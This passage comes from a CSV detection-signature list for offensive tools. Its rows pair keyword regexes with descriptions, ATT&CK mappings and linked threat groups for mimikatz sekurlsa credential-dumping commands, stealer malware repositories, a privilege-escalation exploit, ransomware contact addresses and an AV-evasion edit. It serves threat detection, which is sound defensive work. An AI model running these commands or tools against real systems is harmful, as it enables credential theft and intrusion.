","N/A","N/A","C2","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58327" "*security-onion*",".{0,1000}security\-onion.{0,1000}","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. 
The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation OS","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","N/A","10","3085","523","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z","58328" "*securityRook@onionmail.org*",".{0,1000}securityRook\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58329" "*securycore/Ikeext-Privesc*",".{0,1000}securycore\/Ikeext\-Privesc.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","58330" "*SecUser1/Necro-Stealer*",".{0,1000}SecUser1\/Necro\-Stealer.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","1","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","58331" "*SecUser1/PredatorTheStealer*",".{0,1000}SecUser1\/PredatorTheStealer.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","1","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","58332" 
"*secxrosqawaefsio3biv2dmi2c5yunf3t7ilwf54czq3v4bi7w6mbfad.onion*",".{0,1000}secxrosqawaefsio3biv2dmi2c5yunf3t7ilwf54czq3v4bi7w6mbfad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58333" "*sed -i -e 's/ArgumentPtr/NotTodayPal/*",".{0,1000}sed\s\-i\s\-e\s\'s\/ArgumentPtr\/NotTodayPal\/.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","58334" "*SeDebugPrivilegePoC.exe*",".{0,1000}SeDebugPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58336" "*SeeYouCM-Thief.git*",".{0,1000}SeeYouCM\-Thief\.git.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","58337" "*SeeYouCM-Thief-main*",".{0,1000}SeeYouCM\-Thief\-main.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH 
credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","58338" "*sekurlsa *",".{0,1000}sekurlsa\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58339" "*sekurlsa::backupkeys*",".{0,1000}sekurlsa\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58340" "*sekurlsa::bootkey*",".{0,1000}sekurlsa\:\:bootkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58341" "*sekurlsa::cloudap*",".{0,1000}sekurlsa\:\:cloudap.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58342" "*sekurlsa::credman*",".{0,1000}sekurlsa\:\:credman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58343" "*sekurlsa::dpapi*",".{0,1000}sekurlsa\:\:dpapi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58344" "*sekurlsa::dpapisystem*",".{0,1000}sekurlsa\:\:dpapisystem.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58345" "*sekurlsa::ekeys*",".{0,1000}sekurlsa\:\:ekeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function dumps DPAPI backup keys for users who have logged on to the system","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58346" "*sekurlsa::kerberos*",".{0,1000}sekurlsa\:\:kerberos.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58347" "*sekurlsa::krbtgt*",".{0,1000}sekurlsa\:\:krbtgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58348" "*sekurlsa::livessp*",".{0,1000}sekurlsa\:\:livessp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58349" "*sekurlsa::logonPasswords full*",".{0,1000}sekurlsa\:\:logonPasswords\sfull.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","58350" "*sekurlsa::logonpasswords*",".{0,1000}sekurlsa\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function retrieves plaintext credentials from the LSA secrets in memory.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58351" "*sekurlsa::minidump debug.out*",".{0,1000}sekurlsa\:\:minidump\sdebug\.out.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","58352" "*sekurlsa::minidump*",".{0,1000}sekurlsa\:\:minidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58353" "*sekurlsa::msv*",".{0,1000}sekurlsa\:\:msv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58354" "*sekurlsa::process*",".{0,1000}sekurlsa\:\:process.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58355" "*sekurlsa::pth*",".{0,1000}sekurlsa\:\:pth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
